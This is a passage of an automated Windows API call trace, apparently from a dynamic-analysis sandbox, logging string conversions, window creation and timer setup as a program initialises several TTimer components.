lpWideCharStr="Left正") returned 4 [0281.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Left", cchWideChar=4, lpMultiByteStr=0x634a29c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LeftT", lpUsedDefaultChar=0x0) returned 4 [0281.668] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358518, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0281.668] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358518, cbMultiByte=3, lpWideCharStr=0x6351680, cchWideChar=3 | out: lpWideCharStr="Topt正") returned 3 [0281.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Top", cchWideChar=3, lpMultiByteStr=0x634a2fc, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Top", lpUsedDefaultChar=0x0) returned 3 [0281.668] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0281.668] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=6, lpWideCharStr=0x6351680, cchWideChar=6 | out: lpWideCharStr="TTimer") returned 6 [0281.668] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0281.668] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=6, lpWideCharStr=0x6351680, cchWideChar=6 | out: lpWideCharStr="tmrM82") returned 6 [0281.668] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x60d99c5, cbMultiByte=6, lpWideCharStr=0x634a2dc, cchWideChar=7 | out: lpWideCharStr="TTimer") returned 6 [0281.668] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="TTimer", cchCount1=6, lpString2="TTimer", cchCount2=6) returned 2 [0281.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x534f581, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="¡4\x06çF}w<¡4\x06\x88½+", lpUsedDefaultChar=0x0) returned 0 [0281.668] GetClassInfoW (in: hInstance=0x5fc0000, lpClassName="TPUtilWindow", lpWndClass=0x534f680 | out: lpWndClass=0x534f680) returned 1 [0281.668] CreateWindowExW (dwExStyle=0x80, lpClassName="TPUtilWindow", lpWindowName="", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x5fc0000, lpParam=0x0) returned 0x10116 [0281.669] SetWindowLongW (hWnd=0x10116, nIndex=-4, dwNewLong=54661025) returned 100465804 [0281.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x534f595, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0281.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrM82", cchWideChar=6, lpMultiByteStr=0x534f595, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrM82", lpUsedDefaultChar=0x0) returned 6 [0281.669] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0281.669] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=7, lpWideCharStr=0x634a2d8, cchWideChar=7 | out: lpWideCharStr="Enabledr") returned 7 [0281.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Enabled", cchWideChar=7, lpMultiByteStr=0x636012c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Enabled", lpUsedDefaultChar=0x0) returned 7 [0281.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="False", cchWideChar=5, lpMultiByteStr=0x634a33c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="False", lpUsedDefaultChar=0x0) returned 5 [0281.669] KillTimer (hWnd=0x10116, uIDEvent=0x1) returned 0 [0281.669] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0281.669] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=7, lpWideCharStr=0x634a298, cchWideChar=7 | out: lpWideCharStr="OnTimered") returned 7 [0281.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OnTimer", cchWideChar=7, lpMultiByteStr=0x636012c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OnTimer", lpUsedDefaultChar=0x0) returned 7 [0281.669] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0281.669] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=11, lpWideCharStr=0x6360128, cchWideChar=11 | out: lpWideCharStr="tmrM82Timer") returned 11 [0281.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrM82Timer", cchWideChar=11, lpMultiByteStr=0x534f4e5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrM82Timer\x0b", lpUsedDefaultChar=0x0) returned 11 [0281.669] KillTimer (hWnd=0x10116, uIDEvent=0x1) returned 0 [0281.669] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358518, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0281.669] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358518, cbMultiByte=4, lpWideCharStr=0x6351668, cchWideChar=4 | out: lpWideCharStr="Left敭r\x01") returned 4 [0281.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Left", cchWideChar=4, lpMultiByteStr=0x634a29c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LeftT", lpUsedDefaultChar=0x0) returned 4 [0281.670] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358518, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0281.670] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358518, cbMultiByte=3, lpWideCharStr=0x6351668, cchWideChar=3 | out: lpWideCharStr="Topt敭r\x01") returned 3 [0281.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Top", cchWideChar=3, lpMultiByteStr=0x634a31c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Top", lpUsedDefaultChar=0x0) returned 3 [0281.670] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0281.670] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=6, lpWideCharStr=0x6351668, cchWideChar=6 | out: lpWideCharStr="TTimerೠص\x02") returned 6 [0281.670] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=12, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0281.670] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=12, lpWideCharStr=0x6360150, cchWideChar=12 | out: lpWideCharStr="tmrF4s38M100r") returned 12 [0281.670] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x60d99c5, cbMultiByte=6, lpWideCharStr=0x634a31c, cchWideChar=7 | out: lpWideCharStr="TTimer") returned 6 [0281.670] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="TTimer", cchCount1=6, lpString2="TTimer", cchCount2=6) returned 2 [0281.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x534f581, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="¡4\x06çF}w<¡4\x06\x88½+", lpUsedDefaultChar=0x0) returned 0 [0281.670] GetClassInfoW (in: hInstance=0x5fc0000, lpClassName="TPUtilWindow", lpWndClass=0x534f680 | out: lpWndClass=0x534f680) returned 1 [0281.670] CreateWindowExW (dwExStyle=0x80, lpClassName="TPUtilWindow", lpWindowName="", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x5fc0000, lpParam=0x0) returned 0x10118 [0281.670] SetWindowLongW (hWnd=0x10118, nIndex=-4, dwNewLong=54661012) returned 100465804 [0281.671] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x534f595, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0281.671] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrF4s38M100", cchWideChar=12, lpMultiByteStr=0x534f595, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrF4s38M100", lpUsedDefaultChar=0x0) returned 12 [0281.671] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0281.671] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=7, lpWideCharStr=0x634a318, cchWideChar=7 | out: lpWideCharStr="Enabledr") returned 7 [0281.671] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Enabled", cchWideChar=7, lpMultiByteStr=0x6360154, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Enabled", lpUsedDefaultChar=0x0) returned 7 [0281.671] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="False", cchWideChar=5, lpMultiByteStr=0x634a33c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="False", lpUsedDefaultChar=0x0) returned 5 [0281.671] KillTimer (hWnd=0x10118, uIDEvent=0x1) returned 0 [0281.671] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0281.671] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=8, lpWideCharStr=0x634a2d8, cchWideChar=8 | out: lpWideCharStr="Intervald") returned 8 [0281.671] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Interval", cchWideChar=8, lpMultiByteStr=0x6366d8c, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Intervall", lpUsedDefaultChar=0x0) returned 8 [0281.671] KillTimer (hWnd=0x10118, uIDEvent=0x1) returned 0 [0281.671] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0281.671] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=7, lpWideCharStr=0x634a318, cchWideChar=7 | out: lpWideCharStr="OnTimered") returned 7 [0281.671] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OnTimer", cchWideChar=7, lpMultiByteStr=0x636012c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OnTimer", lpUsedDefaultChar=0x0) returned 7 [0281.671] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x634a298, cbMultiByte=17, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 17 [0281.671] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x634a298, cbMultiByte=17, lpWideCharStr=0x6366d88, cchWideChar=17 | out: lpWideCharStr="tmrF4s38M100Timer") returned 17 [0281.671] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrF4s38M100Timer", cchWideChar=17, lpMultiByteStr=0x534f4e5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrF4s38M100Timer", lpUsedDefaultChar=0x0) returned 17 [0281.671] KillTimer (hWnd=0x10118, uIDEvent=0x1) returned 0 [0281.671] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358518, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0281.671] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358518, cbMultiByte=4, lpWideCharStr=0x6351680, cchWideChar=4 | out: lpWideCharStr="Leftㅍ〰") returned 4 [0281.672] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Left", cchWideChar=4, lpMultiByteStr=0x634a31c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LeftT", lpUsedDefaultChar=0x0) returned 4 [0281.672] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358518, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0281.672] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358518, cbMultiByte=3, lpWideCharStr=0x6351680, cchWideChar=3 | out: lpWideCharStr="Toptㅍ〰") returned 3 [0281.672] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Top", cchWideChar=3, lpMultiByteStr=0x634a2dc, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Top", lpUsedDefaultChar=0x0) returned 3 [0281.672] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0281.672] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=6, lpWideCharStr=0x6351680, cchWideChar=6 | out: lpWideCharStr="TTimer") returned 6 [0281.672] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0281.672] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=9, lpWideCharStr=0x634a2d8, cchWideChar=9 | out: lpWideCharStr="tmrM81mg2") returned 9 [0281.672] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x60d99c5, cbMultiByte=6, lpWideCharStr=0x634a2dc, cchWideChar=7 | out: lpWideCharStr="TTimer") returned 6 [0281.672] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="TTimer", cchCount1=6, lpString2="TTimer", cchCount2=6) returned 2 [0281.672] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x534f581, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="¡4\x06çF}w<¡4\x06\x88½+", lpUsedDefaultChar=0x0) returned 0 [0281.672] GetClassInfoW (in: hInstance=0x5fc0000, lpClassName="TPUtilWindow", lpWndClass=0x534f680 | out: lpWndClass=0x534f680) returned 1 [0281.672] CreateWindowExW (dwExStyle=0x80, lpClassName="TPUtilWindow", lpWindowName="", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x5fc0000, lpParam=0x0) returned 0x1011a [0281.673] SetWindowLongW (hWnd=0x1011a, nIndex=-4, dwNewLong=54660999) returned 100465804 [0281.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x534f595, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0281.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrM81mg2", cchWideChar=9, lpMultiByteStr=0x534f595, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrM81mg2", lpUsedDefaultChar=0x0) returned 9 [0281.673] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0281.673] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=7, lpWideCharStr=0x634a2d8, cchWideChar=7 | out: lpWideCharStr="Enabledr") returned 7 [0281.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Enabled", cchWideChar=7, lpMultiByteStr=0x6360154, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Enabled", lpUsedDefaultChar=0x0) returned 7 [0281.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="False", cchWideChar=5, lpMultiByteStr=0x634a33c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="False", lpUsedDefaultChar=0x0) returned 5 [0281.673] KillTimer (hWnd=0x1011a, uIDEvent=0x1) returned 0 [0281.673] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0281.673] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351668, cbMultiByte=7, lpWideCharStr=0x634a298, cchWideChar=7 | out: lpWideCharStr="OnTimered") returned 7 [0281.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OnTimer", cchWideChar=7, lpMultiByteStr=0x6360154, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OnTimer", lpUsedDefaultChar=0x0) returned 7 [0281.673] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x634a2d8, cbMultiByte=14, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0281.673] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x634a2d8, cbMultiByte=14, lpWideCharStr=0x6360150, cchWideChar=14 | out: lpWideCharStr="tmrM81mg2Timer") returned 14 [0281.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrM81mg2Timer", cchWideChar=14, lpMultiByteStr=0x534f4e5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrM81mg2Timer", lpUsedDefaultChar=0x0) returned 14 [0281.673] KillTimer (hWnd=0x1011a, uIDEvent=0x1) returned 0 [0281.673] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358518, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0281.673] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358518, cbMultiByte=4, lpWideCharStr=0x6351668, cchWideChar=4 | out: lpWideCharStr="Left2") returned 4 [0281.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Left", cchWideChar=4, lpMultiByteStr=0x634a29c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LeftT", lpUsedDefaultChar=0x0) returned 4 [0281.674] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358518, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0281.674] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358518, cbMultiByte=3, lpWideCharStr=0x6351668, cchWideChar=3 | out: lpWideCharStr="Topt2") returned 3 [0281.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Top", cchWideChar=3, lpMultiByteStr=0x634a31c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Top", lpUsedDefaultChar=0x0) returned 3 [0281.674] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0281.674] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=6, lpWideCharStr=0x6351668, cchWideChar=6 | out: lpWideCharStr="TTimerೠص\x02") returned 6 [0281.674] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=10, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0281.674] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=10, lpWideCharStr=0x634a318, cchWideChar=10 | out: lpWideCharStr="tmrM4g81mg\x01") returned 10 [0281.674] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x60d99c5, cbMultiByte=6, lpWideCharStr=0x634a31c, cchWideChar=7 | out: lpWideCharStr="TTimer") returned 6 [0281.674] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="TTimer", cchCount1=6, lpString2="TTimer", cchCount2=6) returned 2 [0281.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x534f581, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="¡4\x06çF}w<¡4\x06\x88½+", lpUsedDefaultChar=0x0) returned 0 [0281.674] GetClassInfoW (in: hInstance=0x5fc0000, lpClassName="TPUtilWindow", lpWndClass=0x534f680 | out: lpWndClass=0x534f680) returned 1 [0281.674] CreateWindowExW (dwExStyle=0x80, lpClassName="TPUtilWindow", lpWindowName="", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x5fc0000, lpParam=0x0) returned 0x1011c [0281.674] SetWindowLongW (hWnd=0x1011c, nIndex=-4, dwNewLong=54660986) returned 100465804 [0281.675] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x534f595, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0281.675] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrM4g81mg", cchWideChar=10, lpMultiByteStr=0x534f595, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrM4g81mg", lpUsedDefaultChar=0x0) returned 10 [0281.675] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0281.675] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=7, lpWideCharStr=0x634a318, cchWideChar=7 | out: lpWideCharStr="Enabledr") returned 7 [0281.675] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Enabled", cchWideChar=7, lpMultiByteStr=0x636017c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Enabled", lpUsedDefaultChar=0x0) returned 7 [0281.675] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="False", cchWideChar=5, lpMultiByteStr=0x634a33c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="False", lpUsedDefaultChar=0x0) returned 5 [0281.675] KillTimer (hWnd=0x1011c, uIDEvent=0x1) returned 0 [0281.675] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0281.675] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=8, lpWideCharStr=0x634a2d8, cchWideChar=8 | out: lpWideCharStr="Intervald") returned 8 [0281.675] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Interval", cchWideChar=8, lpMultiByteStr=0x6366d8c, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Interval8", lpUsedDefaultChar=0x0) returned 8 [0281.675] KillTimer (hWnd=0x1011c, uIDEvent=0x1) returned 0 [0281.675] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0281.675] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6351680, cbMultiByte=7, lpWideCharStr=0x634a318, cchWideChar=7 | out: lpWideCharStr="OnTimered") returned 7 [0281.675] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OnTimer", cchWideChar=7, lpMultiByteStr=0x63601a4, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OnTimer", lpUsedDefaultChar=0x0) returned 7 [0281.675] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x634a298, cbMultiByte=15, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 15 [0281.675] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x634a298, cbMultiByte=15, lpWideCharStr=0x6366d88, cchWideChar=15 | out: lpWideCharStr="tmrM4g81mgTimerr") returned 15 [0281.675] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrM4g81mgTimer", cchWideChar=15, lpMultiByteStr=0x534f4e5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrM4g81mgTimer\x0f", lpUsedDefaultChar=0x0) returned 15 [0281.675] KillTimer (hWnd=0x1011c, uIDEvent=0x1) returned 0 [0281.675] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358518, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0281.675] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x6358518, cbMultiByte=4, lpWideCharStr=0x6351680, cchWideChar=4 